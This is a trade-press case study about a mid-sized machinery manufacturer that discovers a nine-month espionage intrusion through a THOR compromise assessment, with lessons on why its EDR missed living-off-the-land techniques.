Case Study: Mid-Sized Manufacturer Detects APT After 9 Months – Thanks to THOR Scan

A machinery manufacturing company discovered during a routine compromise assessment with THOR that attackers had been active in their network undetected for 9 months. The case shows: EDR alone is not enough.

TL;DR

A machinery manufacturing company discovered during a routine compromise assessment with THOR from Nextron Systems that attackers had been active in their network undetected for 9 months. The APT group had exfiltrated design data and patent information. The case shows: EDR alone is not enough – regular compromise assessments are indispensable.

Initial Situation

The company is a specialist machinery manufacturer with 450 employees and locations in Germany, China, and the USA. The IT infrastructure was equipped with a well-known EDR product. There were no known security incidents.

As part of an NIS2 preparation measure, the company commissioned a service provider to conduct a compromise assessment. THOR Full was used in combination with Velociraptor for centralized control.

What THOR Found

The scan of 320 endpoints and 40 servers delivered several critical findings within 48 hours:

• Modified Windows system files on three engineering workstations (YARA match with known APT toolset)
• Anomalous scheduled tasks for persistent backdoor communication
• Sigma hits in Windows event logs: Suspicious lateral movement patterns over 9 months
• Webshell on an internal web server used as a pivot point

Why the EDR Did Not Detect the Attack

The attackers used Living-off-the-Land techniques (LOLBins): Legitimate Windows tools such as PowerShell, certutil, and wmic for their activities. The EDR classified these executions as normal because they frequently occurred in the context of engineering software.

THOR, on the other hand, did not look for suspicious executions but for the artifacts left behind by the attackers: modified files, suspicious registry entries, and log traces.

Scope of Compromise

The forensic analysis revealed:

• Initial access via a spear-phishing email to an engineer
• Lateral movement across 5 systems over 9 months
• Exfiltration of approximately 12 GB of design data and 3 patent applications
• No destructive damage (espionage, not sabotage)

Lessons Learned

• EDR does not detect everything – especially LOLBin-based APTs are often overlooked
• Regular compromise assessments (at least semi-annually) find what EDR misses
• THOR + Velociraptor is a cost-effective combination for enterprise scans
• Engineering workstations are high-value targets and require special monitoring

Key Facts

Industry: Machinery manufacturing

Attacker dwell time: 9 months

Detection by: THOR Compromise Assessment

Exfiltrated data: 12 GB design data, 3 patent applications

EDR was installed but did not detect the APT

Fact: Mandiant estimates the average dwell time for APT attacks in 2024 at 10 days – but often over 200 days for undetected compromises.

Fact: According to CrowdStrike, the number of state-sponsored attacker groups has more than doubled since 2020 – to over 230 active groups worldwide.

Frequently Asked Questions

Why didn’t the EDR detect the APT?

The attackers used Living-off-the-Land techniques – legitimate Windows tools like PowerShell and certutil. EDR systems often do not recognize these as suspicious when they occur in the context of normal business processes.

How often should compromise assessments be conducted?

At least semi-annually for companies with a high risk profile. Additionally, after any suspected incident, during acquisitions (due diligence), and as a supplement to regular penetration tests.

Why do APT attacks remain undetected for so long?

APT groups use so-called Living-off-the-Land techniques, where they utilize legitimate system tools like PowerShell or WMI to move within the network. Since these tools are part of normal operations, they rarely trigger alarms. Only specialized compromise assessment tools like THOR detect the subtle traces of such attacks.

Related Articles

NIS2 Directive: What Companies Need to Know

Cyber Insurance 2026

Zero Trust: The 7 Most Common Mistakes

Related Events

• secIT by Heise 2026: The Security Roadshow for Admins and IT Decision-Makers
• DsiN Annual Congress 2026: Digital Security in the Connected Society
• Cybersec Europe 2026: Brussels’ Security Conference at the Heart of EU Regulation

More from the MBF Media Network

• More IT security trends on mybusinessfuture.com
• IT strategies for decision-makers on digital-chiefs.de

Header Image Source: Pexels / cottonbro studio

About the author: Tobias Massow

More articles by Tobias Massow